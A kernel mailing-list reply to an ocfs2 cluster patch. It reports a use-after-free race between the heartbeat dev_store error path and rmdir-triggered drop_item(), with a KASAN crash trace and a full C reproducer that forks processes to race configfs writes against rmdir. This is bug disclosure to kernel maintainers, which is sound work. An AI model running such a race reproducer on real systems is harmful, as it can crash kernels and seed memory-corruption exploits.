Re: [PATCH] ocfs2/cluster: reject local node clears while heartbeat runs

From: XIAO WU

Date: Sun Jun 21 2026 - 07:17:42 EST


Hi Cen,

I saw the discussion with Joseph about the v2 fixes.  Before v2 goes out,
I wanted to flag a pre-existing race condition that a Sashiko AI code
review [1] found in the same function.

The `o2hb_region_dev_store()` error path can race with
`o2hb_heartbeat_group_drop_item()` (triggered by rmdir) because configfs
allows concurrent store() and drop_item().  If drop_item() tears down the
region while dev_store is in its error path, the subsequent
`fput(reg->hr_bdev_file)` hits a use-after-free.

I was able to reproduce this in QEMU with KASAN by forking multiple
children to race dev_store writes against rmdir on the same heartbeat
region.

On Sun, Jun 14, 2026 at 01:33:45PM +0800, Cen Zhang wrote:
> Track the heartbeat start/run/stop window with a per-region active
> flag protected by o2hb_live_lock. This prevents o2nm_node_local_store()
> from clearing the local node while heartbeat threads are still active.

The `hr_heartbeat_active` flag protects against the node clear race,
but the error path in `dev_store` can still race with `drop_item()`
via configfs concurrency:

```c
// dev_store() error path after configfs has accepted the write:
// at this point, drop_item() can run in parallel via rmdir
fput(reg->hr_bdev_file);  // UAF if drop_item() already freed it
```

[KASAN report — kernel 7.1.0-rc7-next-20260612, CONFIG_KASAN=y]

  BUG: KASAN: null-ptr-deref in fput+0x33/0x100
  BUG: kernel NULL pointer dereference, address: 0000000000000158
  Oops: Oops: 0002 [#1] SMP KASAN NOPTI

  Call Trace:
   <TASK>
   fput+0x33/0x100
   o2hb_region_dev_store+0x1327/0x1da0
   configfs_write_iter+0x.../...
   vfs_write+0x.../...
   ksys_write+0x.../...
   do_syscall_64+0xcd/0xf80
   entry_SYSCALL_64_after_hwframe+0x77/0x7f

The crash is in `fput(reg->hr_bdev_file)` on the `dev_store` error path,
after a concurrent `drop_item()` (via rmdir) had already torn down the
region.  KASAN flags it as a NULL pointer dereference, which here is the
symptom of the use-after-free.

Full PoC source (poc.c):
---8<----------------------------------------------------------------
#define _GNU_SOURCE
#include <stdio.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/stat.h>
#include <sys/wait.h>
#include <string.h>
#include <stdlib.h>

#define CFG "/sys/kernel/config/cluster/poccluster"

int main(void)
{
    char p[256], loopdev[64] = "/dev/loop0";
    printf("[*] OCFS2 heartbeat PoC\n");

    system("dd if=/dev/zero of=/tmp/hb.img bs=1M count=30 2>/dev/null");
    system("losetup -f /tmp/hb.img 2>/dev/null");
    FILE *fp = popen("losetup -j /tmp/hb.img -O NAME "
                     "--noheadings 2>/dev/null", "r");
    if (fp && fgets(loopdev, sizeof(loopdev), fp))
        loopdev[strcspn(loopdev, "\n")] = 0;
    if (fp) pclose(fp);

    snprintf(p, sizeof(p), CFG); mkdir(p, 0755);
    snprintf(p, sizeof(p), CFG "/node/mynode"); mkdir(p, 0755);
    int fd = open(CFG "/node/mynode/ipv4_address", O_WRONLY);
    if (fd >= 0) { write(fd, "127.0.0.1", 9); close(fd); }
    fd = open(CFG "/node/mynode/ipv4_port", O_WRONLY);
    if (fd >= 0) { write(fd, "7777", 4); close(fd); }
    fd = open(CFG "/node/mynode/num", O_WRONLY);
    if (fd >= 0) { write(fd, "0", 1); close(fd); }
    fd = open(CFG "/node/mynode/local", O_WRONLY);
    if (fd >= 0) { write(fd, "1", 1); close(fd); }

    for (int i = 0; i < 100; i++) {
        snprintf(p, sizeof(p), CFG "/heartbeat/reg");
        if (mkdir(p, 0755) < 0) { rmdir(p); usleep(1000); continue; }

        fd = open(CFG "/heartbeat/reg/block_bytes", O_WRONLY);
        if (fd >= 0) { write(fd, "512", 3); close(fd); }
        fd = open(CFG "/heartbeat/reg/start_block", O_WRONLY);
        if (fd >= 0) { write(fd, "1", 1); close(fd); }
        fd = open(CFG "/heartbeat/reg/blocks", O_WRONLY);
        if (fd >= 0) { write(fd, "4", 1); close(fd); }

        int loop_fd = open(loopdev, O_RDWR);
        if (loop_fd < 0) { usleep(1000); continue; }

        pid_t pids[7];
        for (int j = 0; j < 7; j++) {
            pids[j] = fork();
            if (pids[j] == 0) {
                if (j < 4) {
                    /* dev_store writers */
                    usleep(j * 20);
                    char fdstr[16];
                    snprintf(fdstr, sizeof(fdstr), "%d", loop_fd);
                    snprintf(p, sizeof(p), CFG "/heartbeat/reg/dev");
                    int dev_fd = open(p, O_WRONLY);
                    if (dev_fd >= 0) {
                        write(dev_fd, fdstr, strlen(fdstr));
                        close(dev_fd);
                    }
                } else {
                    /* rmdir — triggers drop_item() */
                    usleep(j * 30);
                    snprintf(p, sizeof(p), CFG "/heartbeat/reg");
                    rmdir(p);
                }
                _exit(0);
            }
        }
        close(loop_fd);
        for (int j = 0; j < 7; j++) {
            int st;
            if (pids[j] > 0)  /* skip slots where fork() failed */
                waitpid(pids[j], &st, 0);
        }
        snprintf(p, sizeof(p), CFG "/heartbeat/reg"); rmdir(p);
    }
    printf("[*] Done. Check dmesg.\n");
    return 0;
}
---8<----------------------------------------------------------------
Compile: gcc -o poc poc.c

[1] https://sashiko.dev/#/patchset/20260614053345.64053-1-zzzccc427%40gmail.com
    (Sashiko AI code review — "Use-After-Free", Severity: Critical)

Thanks,
XIAO